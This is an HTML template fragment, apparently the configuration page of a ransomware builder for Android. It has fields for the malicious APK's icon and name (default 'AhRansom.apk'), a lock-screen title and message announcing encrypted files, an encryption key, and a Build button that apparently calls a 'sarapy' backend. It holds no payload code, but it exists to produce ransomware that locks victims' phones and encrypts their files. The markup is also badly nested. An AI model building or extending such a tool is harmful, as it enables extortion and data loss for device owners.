<div class="ui segment h100">

    <table class="ui very compact table">
        <thead>
            <tr class="center aligned">
                <th colspan="2">Android Ransomware Configuration</th>
            </tr>
        </thead>
        <tbody>
    <table class="ui very compact table">
        <thead>
            <tr class="center aligned">
                <th colspan="2">
                        <label>APK Ransomware</label>
                    </div>
                </th>
            </tr>
        </thead>
        <tbody>
            <tr class="center aligned">
                <td colspan="2">
                    <div class="ui labeled fluid input">
                        <div class="ui black label">
                        Apk Icon
                        </div>
                     <input ng-model="srcIcon" type="text" id="icon" name="icon" placeholder="Pictures/test.png"onblur="this.value=removeSpaces(this.value);">
                     <input ng-model="SrcApkName" type="text" id="name" placeholder="default is AhRansom.apk"onblur="this.value=removeSpaces(this.value);">
                     <div class="ui labeled fluid input">
                        <div class="ui black label">
                        Apk Name
                        </div>
                    <tr class="center aligned">
                <td colspan="2">
                    <div class="ui labeled fluid input">
                        <div class="ui black label">
                        Screen Title
                        </div>
                     <input ng-model="srcTitle" type="text" id="title" name="title" placeholder="you've been locked out!"onblur="this.value=removeSpaces(this.value);">
                     <input ng-model="srcMessage" type="text" id="desc" name="desc" placeholder="your files have been encrypted!"onblur="this.value=removeSpaces(this.value);">
                     <div class="ui labeled fluid input">
                        <div class="ui black label">
                        Screen Message
                        </div>
                    <tr class="center aligned">
                <td colspan="2">
                    <div class="ui labeled fluid input">
                        <div class="ui black label">
                        Key
                        </div>
                     <input ng-model="srcKey" type="text" id="key" name="key" placeholder="yellow submarine"onblur="this.value=removeSpaces(this.value);">
                     <div class="ui icon labeled black label"><i class="key icon"></i>
                        </div>
                    <tfoot class="full-width">
                <tr class="center aligned">
                    <th colspan="2">
                        <button ng-click="callsarapy(Build)" class="ui labeled icon black button"><i class="bug icon"></i>Build</button>
                        <button ng-click="Check()" class="ui labeled icon black button"><i class="bug icon"></i>Locate SARA Ransom</button>
                    </th>
                </tr>
            </tfoot>
        </table>
    </div>
<script language="javascript" type="text/javascript">
function removeSpaces(string) {
 return string.split(' ').join('_');
}
</script>                         
